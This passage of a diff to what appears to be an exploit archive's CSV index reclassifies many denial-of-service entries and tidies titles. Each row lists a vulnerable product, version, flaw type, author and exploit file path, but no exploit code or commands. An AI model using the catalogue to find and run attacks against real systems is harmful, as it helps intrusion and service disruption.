+20753,platforms/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,dos,0 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0 20762,platforms/php/webapps/20762.php,"webpa <= 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS Vulnerability",2001-04-16,"SecureXpert Labs",windows,dos,0 @@ -18088,7 +18088,7 @@ id,file,description,date,author,platform,type,port 20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 websyncd Remote Buffer Overflow Vulnerability",2001-04-17,"Enrique A.",cgi,remote,0 20781,platforms/linux/local/20781.txt,"SUSE 7.0 KFM Insecure TMP File Creation Vulnerability",2001-04-18,"Paul Starzetz",linux,local,0 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability",2001-04-20,"Georgi Guninski",windows,remote,0 -20783,platforms/windows/remote/20783.txt,"Rit Research Labs _The Bat!_ 1.x Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,remote,0 +20783,platforms/windows/dos/20783.txt,"Rit Research Labs _The Bat!_ 1.x - Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,dos,0 20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0day)",2012-08-24,X-h4ck,windows,dos,0 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 @@ -18106,7 +18106,7 @@ id,file,description,date,author,platform,type,port 20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (1)",2000-01-11,"Synnergy Networks",cgi,remote,0 20800,platforms/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2)",2000-01-11,missnglnk,cgi,remote,0 20801,platforms/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3)",2000-01-20,ytcracker,cgi,remote,0 -20802,platforms/windows/remote/20802.c,"Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,remote,0 +20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,dos,0 20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal Vulnerability",2001-04-25,joetesta,windows,remote,0 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0 20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6_OpenLinux 1.0/1.1 - routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0 @@ -18114,11 +18114,11 @@ id,file,description,date,author,platform,type,port 20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0 20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password Vulnerability",1998-11-30,"Michael Gerdts",cgi,remote,0 -20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 -20811,platforms/multiple/remote/20811.cpp,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,remote,0 -20812,platforms/windows/remote/20812.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0 -20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0 -20814,platforms/windows/remote/20814.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0 +20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,dos,0 +20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,dos,0 +20812,platforms/windows/dos/20812.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,dos,0 +20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,dos,0 +20814,platforms/windows/dos/20814.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,dos,0 20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0 20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0 @@ -18134,7 +18134,7 @@ id,file,description,date,author,platform,type,port 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service Vulnerability",2001-05-07,neme-dhc,multiple,dos,0 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service Vulnerability",2001-05-07,nemesystm,windows,dos,0 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal Vulnerability",2001-05-07,neme-dhc,windows,remote,0 -20830,platforms/windows/remote/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 MS-DOS Device Name DoS Vulnerability",2001-05-07,neme-dhc,windows,remote,0 +20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS Vulnerability",2001-05-07,neme-dhc,windows,dos,0 20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 @@ -18149,7 +18149,7 @@ id,file,description,date,author,platform,type,port 20842,platforms/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0 20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0_ Redhat 5.2/6.2/7.0_ S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability",2001-05-10,"Jass Seljamaa",osx,dos,0 -20845,platforms/osx/remote/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev Remote DoS",2001-05-15,"Jass Seljamaa",osx,remote,0 +20845,platforms/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote DoS",2001-05-15,"Jass Seljamaa",osx,dos,0 20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability",2000-05-14,"Nelson Bunker",windows,dos,0 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0 20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 URL Block Arbitrary File Disclosure Vulnerability",2001-04-15,"tobozo tagada",php,webapps,0 @@ -18205,7 +18205,7 @@ id,file,description,date,author,platform,type,port 20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0 20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0 20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0 -20904,platforms/windows/remote/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,remote,0 +20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 20905,platforms/unix/local/20905.txt,"Thibault Godouet FCron 1 Symbolic Link Vulnerability",2001-06-07,"Uwe Ohse",unix,local,0 20906,platforms/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Buffer Overflow Vulnerability",2001-06-07,dex,unix,local,0 20907,platforms/windows/dos/20907.sh,"Microsoft Windows 2000 Telnet Username DoS Vulnerability",2001-06-07,"Michal Zalewski",windows,dos,0 @@ -18270,7 +18270,7 @@ id,file,description,date,author,platform,type,port 20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (2)",2001-06-27,Fyodor,solaris,local,0 20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0 -20973,platforms/multiple/remote/20973.txt,"Icecast 1.1.x/1.3.x Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,remote,0 +20973,platforms/multiple/dos/20973.txt,"Icecast 1.1.x/1.3.x - Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,dos,0 20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability",2001-06-01,"Pablo Sor",solaris,local,0 20975,platforms/hardware/remote/20975.pl,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (1)",2001-06-27,cronos,hardware,remote,0 20976,platforms/hardware/remote/20976.c,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (2)",2001-06-27,"Eliel C. Sardanons",hardware,remote,0 @@ -18312,7 +18312,7 @@ id,file,description,date,author,platform,type,port 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service Vulnerability",2001-07-17,"Andy Gavin",multiple,dos,0 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 -21016,platforms/windows/remote/21016.c,"ID Software Quake 3 - _smurf attack_ Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 +21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - _smurf attack_ Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,dos,0 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 File Disclosure Vulnerability",2001-07-13,"Caldera Open Linux",linux,remote,0 21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x_SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability",2001-07-20,byterage,multiple,local,0 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 Short Password Login Vulnerability",2001-07-21,hypoclear,unix,remote,0 @@ -18333,7 +18333,7 @@ id,file,description,date,author,platform,type,port 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD Vulnerability",2001-06-23,zen-parse,linux,remote,0 21038,platforms/php/webapps/21038.txt,"PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal Vulnerability",2001-07-26,THRAN,windows,remote,0 -21040,platforms/windows/remote/21040.txt,"Windows 98 ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,remote,0 +21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,dos,0 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow Vulnerability",2001-07-29,Coolest,multiple,dos,0 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate Arbitrary Command Execution Vulnerability",2001-08-01,"Josh Smith",linux,local,0 21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 @@ -18368,7 +18368,7 @@ id,file,description,date,author,platform,type,port 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption Vulnerability",2001-08-20,MacSec,osx,local,0 -21077,platforms/bsd/local/21077.c,"BSDI 3.0/3.1 Possible Local Kernel Denial of Service Vulnerability",2001-08-21,V9,bsd,local,0 +21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service Vulnerability",2001-08-21,V9,bsd,dos,0 21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 Weak Password Encryption Vulnerability",2001-08-23,"Desmond Irvine",multiple,local,0 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation Vulnerability",2012-09-05,metasploit,php,webapps,0 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,metasploit,multiple,remote,0 @@ -18452,7 +18452,7 @@ id,file,description,date,author,platform,type,port 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability",2001-11-26,StatiC,windows,remote,0 21165,platforms/php/webapps/21165.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x user.php uname Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 21166,platforms/php/webapps/21166.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x modules.php Multiple Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 -21167,platforms/openbsd/local/21167.c,"OpenBSD 2.x/3.0 User Mode Return Value Denial of Service Vulnerability",2001-12-03,"Marco Peereboom",openbsd,local,0 +21167,platforms/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service Vulnerability",2001-12-03,"Marco Peereboom",openbsd,dos,0 21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 NewsDatabase/Template Modification Vulnerability",2001-12-01,"markus arndt",php,webapps,0 21169,platforms/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x Outbound Packet Bypass Vulnerability",2001-12-06,"Tom Liston",windows,remote,0 21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 Game Server/Client Denial of Service Vulnerability",2001-12-07,sh0,windows,dos,0 @@ -18513,7 +18513,7 @@ id,file,description,date,author,platform,type,port 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0 21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0 -21228,platforms/windows/remote/21228.c,"Sambar Server 5.1 Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,remote,0 +21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,dos,0 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0 21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0 21231,platforms/linux/local/21231.c,"Chinput 3.0 Environment Variable Buffer Overflow Vulnerability",2002-01-16,xperc,linux,local,0 @@ -18544,8 +18544,8 @@ id,file,description,date,author,platform,type,port 21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 Segmentation Violation Vulnerability",2002-01-30,"Taeho Oh",linux,local,0 21260,platforms/windows/remote/21260.txt,"Microsoft Site Server 3.0 - Cross-Site Scripting Vulnerability",2002-01-29,"rain forest puppy",windows,remote,0 -21261,platforms/unix/remote/21261.txt,"Tru64 Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,remote,0 -21262,platforms/linux/remote/21262.txt,"kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,remote,0 +21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0 +21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0 @@ -18588,9 +18588,9 @@ id,file,description,date,author,platform,type,port 21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0 21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 Triple-Dot-Slash Directory Traversal Vulnerability",2002-02-26,"Strumpf Noir Society",windows,remote,0 21304,platforms/php/webapps/21304.txt,"Ikonboard 2.17/3.0/3.1 Image Tag Cross-Agent Scripting Vulnerability",2002-02-26,godminus,php,webapps,0 -21305,platforms/windows/remote/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,remote,0 -21306,platforms/windows/remote/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,remote,0 -21307,platforms/windows/remote/21307.txt,"Rit Research Labs The Bat! 1.53 Microsoft DoS Device Name Denial of Service Vulnerability",2002-02-27,3APA3A,windows,remote,0 +21305,platforms/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,dos,0 +21306,platforms/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,dos,0 +21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft DoS Device Name Denial of Service Vulnerability",2002-02-27,3APA3A,windows,dos,0 21308,platforms/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 Image Tag Cross-Agent Scripting Vulnerability",2002-02-27,Justin,asp,webapps,0 21309,platforms/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote,0 21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 User Status Remote Information Disclosure Vulnerability",2002-02-27,spybreak,linux,remote,0 @@ -18705,7 +18705,7 @@ id,file,description,date,author,platform,type,port 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 Direct Script Call Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting Vulnerability",2002-04-17,frog,php,webapps,0 -21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0 +21428,platforms/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,dos,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow Vulnerability (1)",2002-04-15,"MaD SKiLL",windows,dos,0 22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability",2002-04-12,"Marcelo Magnasco",irix,dos,0 @@ -18881,7 +18881,7 @@ id,file,description,date,author,platform,type,port 21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure Vulnerability",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure Vulnerability",2002-07-09,"Qualys Corporation",multiple,remote,0 21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",linux,remote,0 -21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - DoS Device Name Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 +21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - DoS Device Name & Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 21606,platforms/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 OBJECT Tag Same Origin Policy Violation Vulnerability",2002-07-10,"Thor Larholm",windows,remote,0 21607,platforms/windows/remote/21607.txt,"GoAhead WebServer 2.1.x URL Encoded Slash Directory Traversal Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 21608,platforms/windows/remote/21608.txt,"GoAhead WebServer 2.1.x Error Page Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 @@ -18928,7 +18928,7 @@ id,file,description,date,author,platform,type,port 21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 Unresolved Domain Cross-Site Scripting Vulnerability",2002-07-24,T.Suzuki,multiple,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability",2002-07-25,"Cesar Cerrudo",windows,remote,0 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability",2002-07-25,"David Litchfield",windows,remote,0 -21653,platforms/windows/remote/21653.c,"KaZaA Media Desktop 1.7.1 Large Message Denial of Service Vulnerability",2002-07-25,"Josh and omega",windows,remote,0 +21653,platforms/windows/dos/21653.c,"KaZaA Media Desktop 1.7.1 - Large Message Denial of Service Vulnerability",2002-07-25,"Josh and omega",windows,dos,0 21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 Web Messaging HTTP Get Buffer Overflow Vulnerability",2002-07-25,anonymous,windows,remote,0 21655,platforms/hardware/dos/21655.c,"Cisco IOS 11.x - TFTP Server Long File Name Buffer Overflow Vulnerability",2002-07-26,FX,hardware,dos,0 21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router Long HTTP Request DoS",2002-07-27,FX,hardware,dos,0 @@ -18968,7 +18968,7 @@ id,file,description,date,author,platform,type,port 21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0 21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6_Konqueror 2.2.2/3.0_Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability",2002-08-06,"Dave Aitel",windows,remote,0 -21694,platforms/windows/remote/21694.pl,"602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,remote,0 +21694,platforms/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,dos,0 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (1)",2002-08-08,"Paul Szabo",windows,remote,0 21696,platforms/windows/remote/21696.pl,"Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (2)",2002-08-08,"Paul Szabo",windows,remote,0 21697,platforms/windows/remote/21697.txt,"Apache 2.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-09,"Auriemma Luigi",windows,remote,0 @@ -19333,7 +19333,7 @@ id,file,description,date,author,platform,type,port 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 -22074,platforms/osx/local/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,local,0 +22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.PHP Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0 @@ -19362,12 +19362,12 @@ id,file,description,date,author,platform,type,port 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0 22104,platforms/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 HTML Injection Vulnerability",2002-12-16,"Pedram Amini",php,webapps,0 -22105,platforms/linux/local/22105.c,"Linux Kernel 2.2 - mmap() Local Denial of Service Vulnerability",2002-12-17,"Michal Zalewski",linux,local,0 +22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - mmap() Local Denial of Service Vulnerability",2002-12-17,"Michal Zalewski",linux,dos,0 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x Negative Length HTTP Header Vulnerability",2002-12-19,iDefense,linux,remote,0 22107,platforms/php/webapps/22107.txt,"SPGPartenaires 3.0.1 ident.php 